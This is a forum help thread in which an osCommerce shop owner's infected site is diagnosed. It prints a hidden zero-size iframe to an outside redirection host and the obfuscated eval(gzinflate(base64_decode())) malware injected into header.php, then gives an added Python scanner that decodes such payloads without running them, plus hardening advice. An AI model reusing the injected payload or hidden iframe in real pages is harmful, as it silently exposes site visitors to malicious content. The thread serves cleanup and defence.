gcap Posted May 19, 2010

Hi, Avast is saying my site www.brentwoodnursery.co.za/\{gzip} has traces of html:iframe-inf. I have spoken to my host, who say that the site has not been hacked. I did install an add-on to allow me to run a list of my products. The problem is that on my PC at work it doesn't issue any warning and I can't find any infected text or trace of the text 'iframe' in any index.php or index.html files. I have just launched the site and look really silly with new customers being told that the site is dangerous. I don't know where to find this infected text or how to erase this annoying issue.

germ Posted May 19, 2010

From your HTML source:

<!-- header //-->
<iframe src="http://CoinUrlRedirection.com/x/?src=dg&id=20492" width="0" height="0" scrolling="no" frameborder="0"></iframe><!-- header_eof //-->

Looks like it's in /includes/header.php

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help

gcap Posted May 19, 2010

Thank you ever so much. May I ask you two things?

1. How did you find it so quick?
2. What should I delete from here?

<?php
/*
  $Id: header.php,v 1.42 2003/06/10 18:20:38 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/
eval(gzinflate(base64_decode('JY5NCsIwEEb3hd4hzMLuTClu1PwsvIHgATQZk4E0I9OAHl9bdx+8B+/zzvi+w5BZDYaecp9RLRIs5NZeJ60vTPUm5YqRBEMjrvvAs/5ov1ox7SjaaTwcJ1Bvii1bGEFlpJTbNpcgXArVZKEyqC3wYIkoK3ZG/5tuOPed/335Ag==')));

// check if the 'install' directory exists, and warn of its existence
  if (WARN_INSTALL_EXISTENCE == 'true') {
    if (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/install')) {
      $messageStack->add('header', WARNING_INSTALL_DIRECTORY_EXISTS, 'warning');
    }
  }

// check if the configure.php file is writeable
  if (WARN_CONFIG_WRITEABLE == 'true') {
    if ( (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) && (is_writeable(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) ) {
      $messageStack->add('header', WARNING_CONFIG_FILE_WRITEABLE, 'warning');
    }
  }

// check if the session folder is writeable
  if (WARN_SESSION_DIRECTORY_NOT_WRITEABLE == 'true') {
    if (STORE_SESSIONS == '') {
      if (!is_dir(tep_session_save_path())) {
        $messageStack->add('header', WARNING_SESSION_DIRECTORY_NON_EXISTENT, 'warning');
      } elseif (!is_writeable(tep_session_save_path())) {
        $messageStack->add('header', WARNING_SESSION_DIRECTORY_NOT_WRITEABLE, 'warning');
      }
    }
  }

// check session.auto_start is disabled
  if ( (function_exists('ini_get')) && (WARN_SESSION_AUTO_START == 'true') ) {
    if (ini_get('session.auto_start') == '1') {
      $messageStack->add('header', WARNING_SESSION_AUTO_START, 'warning');
    }
  }

  if ( (WARN_DOWNLOAD_DIRECTORY_NOT_READABLE == 'true') && (DOWNLOAD_ENABLED == 'true') ) {
    if (!is_dir(DIR_FS_DOWNLOAD)) {
      $messageStack->add('header', WARNING_DOWNLOAD_DIRECTORY_NON_EXISTENT, 'warning');
    }
  }

  if ($messageStack->size('header') > 0) {
    echo $messageStack->output('header');
  }
?>

germ Posted May 19, 2010

Evil code:

eval(gzinflate(base64_decode('JY5NCsIwEEb3hd4hzMLuTClu1PwsvIHgATQZk4E0I9OAHl9bdx+8B+/zzvi+w5BZDYaecp9RLRIs5NZeJ60vTPUm5YqRBEMjrvvAs/5ov1ox7SjaaTwcJ1Bvii1bGEFlpJTbNpcgXArVZKEyqC3wYIkoK3ZG/5tuOPed/335Ag==')));

:o

I have a program I wrote on the site I manage that I can tell it to visit any web page and it writes the source code of that web page to a text file so I can examine it. Very useful and written just for this purpose. :)

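
The two posts above show a zero-size iframe in the rendered page and an eval(gzinflate(base64_decode(...))) line in header.php. The following is an added example, not part of the original thread or of osCommerce: it finds that wrapper in PHP source, decodes the payload without executing it, and flags hidden iframes. The sample file and the example.invalid URL are constructed for illustration.

```python
import base64
import re
import zlib

# The wrapper seen in the infected header.php: eval(gzinflate(base64_decode('...')))
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)
# An iframe with zero width or height is invisible to the visitor.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0\b[^>]*>", re.IGNORECASE
)


def decode_wrapped_payloads(php_source):
    """Decode (never execute) every eval(gzinflate(base64_decode())) payload."""
    decoded = []
    for match in WRAPPER.finditer(php_source):
        try:
            raw = base64.b64decode(match.group(2))
            # PHP's gzinflate() reads raw DEFLATE data (no zlib header): wbits=-15.
            text = zlib.decompress(raw, -15).decode("utf-8", errors="replace")
        except (ValueError, zlib.error):
            text = "<undecodable payload>"
        decoded.append(text)
    return decoded


def hidden_iframes(text):
    """Return every zero-width or zero-height iframe tag found in text."""
    return HIDDEN_IFRAME.findall(text)


def make_sample():
    """Build a constructed infected file; example.invalid is a placeholder host."""
    inner = "echo '<iframe src=\"http://example.invalid/x/\" width=\"0\" height=\"0\"></iframe>';"
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(comp.compress(inner.encode()) + comp.flush()).decode()
    return "<?php\neval(gzinflate(base64_decode('%s')));\n// rest of header.php\n?>" % blob


if __name__ == "__main__":
    for payload in decode_wrapped_payloads(make_sample()):
        print(payload)
        print(hidden_iframes(payload))
```

Run decode_wrapped_payloads over the contents of each .php file in a backup copy of the shop, and hidden_iframes over both the decoded payloads and the saved page source.
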
gcap Posted May 19, 2010

Listen, that nearly cost me my business and certainly set us back a bit, so a massive thank you - it has worked. Any advice to avoid it happening again? Hosts said the site wasn't hacked but something went wrong. Thank goodness people like you are around or I would have been stumped. Again, goodnight and thank you.

germ Posted May 19, 2010

> Listen, that nearly cost me my business and certainly set us back a bit, so a massive thank you - it has worked. Any advice to avoid it happening again? Hosts said the site wasn't hacked but something went wrong. Thank goodness people like you are around or I would have been stumped. Again, goodnight and thank you.

You need to protect your admin with a .htaccess file - ASAP.

In the admin, remove file_manager.php and define_language.php - both are extreme security risks.

And read the "How to secure your site" thread in this section of the forum.

gcap Posted May 19, 2010

Delete filemanager_php and define_language.php? Any negatives to doing this? What exactly is a .htaccess file?

germ Posted May 20, 2010

> Delete filemanager_php and define_language.php? Any negatives to doing this? What exactly is a .htaccess file?

Obviously you wouldn't be able to use said files, but they aren't necessary for shop operation. The file manager is a text editor (a faulty one at times). Better to use the one in your host's cPanel or use FTP. I'm not sure what the define language file is for? :unsure:

Search the web about .htaccess. It adds another layer of protection to the admin.

Both of the files I mentioned have security issues that allow a hacker to bypass your admin login screen and access these files in a harmful fashion. That's probably how the rogue code got there to begin with.